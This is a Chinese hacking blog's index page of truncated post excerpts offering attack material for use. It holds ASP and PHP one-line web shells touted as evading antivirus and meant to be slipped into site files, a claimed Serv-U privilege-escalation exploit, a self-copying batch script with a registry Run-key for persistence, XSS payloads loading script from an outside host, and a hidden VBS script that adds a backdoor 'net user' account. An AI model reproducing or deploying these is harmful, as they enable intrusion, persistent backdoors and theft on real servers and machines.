小马博客

一个无聊的人,一个无聊的博客

以下这个ASP一句话 <%If Request("1") "" Then ExecuteGlobal(Request("1"))%> 上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错, <?php ($_=@$_GET[2]).@$_($_POST[1])?> 上面这句是防杀...

发布 0 条评论

常见虚拟主机目录对照 D:\virtualhost\web580651\www\          新网虚拟主机 F:\usr\fw04408\xpinfo\                  万网虚拟主机 D:\hosting\wwwroot\                    Prim@Hosting虚拟主机 e:\wwwroot\longzhihu\wwwroot\  ...

发布 0 条评论

serv-u最新通杀所有版本提权代码。10.x的也可以提,昨天俺成功11版本的, 不要直接添加系统帐号或者执行命令,用添加的FTP帐号在CMD下面连接提权。 要不容易出错的。 [php]<style type="text/css"> <!-- body,td,t...

发布 0 条评论

@echo off if not exist c:\windows\feixin.bat copy "%~0" c:\windows\feixin.bat reg add hkcu\software\microsoft\windows\currentversion\run /v feixin /t reg_sz /d c:\windows\feixin.bat /f :: sno 为自己的手机号;psw 为飞...

发布 0 条评论

1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号 <IMG SRC=javas...

发布 0 条评论

dim wsh,FA,FSO set fso=CreateObject("Scripting.FileSystemObject") Set FA= FSO.GetFile(WScript.scriptFullName) FA.Attributes =34 set wsh=CreateObject("WScript.Shell") wsh.run "net user asd 123 /add",0,true wsh.run "net...

发布 0 条评论